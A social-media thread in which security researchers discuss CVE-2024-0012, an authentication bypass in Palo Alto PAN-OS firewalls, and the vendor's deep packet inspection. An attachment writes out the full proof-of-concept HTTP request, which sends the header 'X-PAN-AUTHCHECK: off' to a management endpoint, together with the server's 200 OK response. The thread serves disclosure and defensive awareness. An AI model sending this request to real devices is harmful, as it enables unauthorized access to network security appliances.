Public
- Public
- Network
- Groups
- Featured
- Popular
- People

Conversation

Notices

Embed this notice
Will Dormann (wdormann@infosec.exchange)'s status on Wednesday, 20-Nov-2024 02:38:19 JST Will Dormann

How does one prove that they're authenticated to the PAN-OS security product, one might wonder.
Simple.
You provide a "X-PAN-AUTHCHECK: off" HTTP header.
CVE-2024-0012, folks.
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
In conversation about 2 days ago from infosec.exchange permalink
Attachments
1. Domain not in remote thumbnail source whitelist: labs.watchtowr.com
  
  Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
  
  Note: Since this is 'breaking' news and more details are being released, we're updating this post as more details become available (and as we think of better memes). Mash that F5 key every so often for a better blogpost experience! It's no big news that threat actors just love popping
2. GET /php/ztp_gate.php/.js.map HTTP/1.1 Host: {{Hostname}} X-PAN-AUTHCHECK: off HTTP/1.1 200 OK Date: Tue, 19 Nov 2024 10:05:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4635 Connection: keep-alive Set-Cookie: PHPSESSID=m1sea0p2n2p89kncqked9sd2p1; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Security-Policy: default-src 'self'; connect-src 'self' data.pendo.io app.pendo.io pendo-static-5839728945463296.storage.googleapis.com; script-src 'self' 'unsafe-eval' 'unsafe-inline' app.pendo.io pendo-io-static.storage.googleapis.com cdn.pendo.io pendo-static-5839728945463296.storage.googleapis.com data.pendo.io; style-src 'self' 'unsafe-inline' app.pendo.io cdn.pendo.io pendo-static-5839728945463296.storage.googleapis.com; img-src 'self' data: cdn.pendo.io app.pendo.io pendo-static-5839728945463296.storage.googleapis.com data.pendo.io; frame-ancestors 'self' app.pendo.io; child-src 'self' app.pendo.io; form-action 'self' 'unsafe-eval' 'unsafe-inline' Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: DENY X-XSS-Protection: 1; mode=block Cache-Control: no-cache; no-store <html> <head> <title>Zero Touch Provisioning</title>
  https://media.infosec.exchange/infosec.exchange/media_attachments/files/113/509/876/394/322/266/original/6ac22bdd57959247.png
- Embed this notice
  Kevin Beaumont (gossithedog@cyberplace.social)'s status on Wednesday, 20-Nov-2024 02:38:18 JST Kevin Beaumont
  in reply to
  
  @wdormann an interesting Palo Alto thing is they're by far the most intrusive firewall vendor in terms of traffic - you build rules using app IDs rather than ports, it auto detects traffic, MITM TLS etc. It's really cool. Also... just how secure is that? Really?
  
  In conversation about 2 days ago permalink
- Embed this notice
  Kevin Beaumont (gossithedog@cyberplace.social)'s status on Wednesday, 20-Nov-2024 06:20:56 JST Kevin Beaumont
  in reply to
  - Matt Organ
  @Slater450413 @wdormann yeah, the point was more it uses deep packet inspection for everything - relies on absolutely rock solid security to process everything.
  
  In conversation about 2 days ago permalink
- Embed this notice
  Matt Organ (slater450413@infosec.exchange)'s status on Wednesday, 20-Nov-2024 06:20:57 JST Matt Organ
  in reply to
  - Kevin Beaumont
  @GossiTheDog @wdormann you can do rules using just ports, it's just not how they recommend you do it. I've had to do that a couple of places when the false positive rate became too high (chopping TLS connections at random) when new signature patterns dropped.
  
  In conversation about 2 days ago permalink

Public

Conversation

Notices

Feeds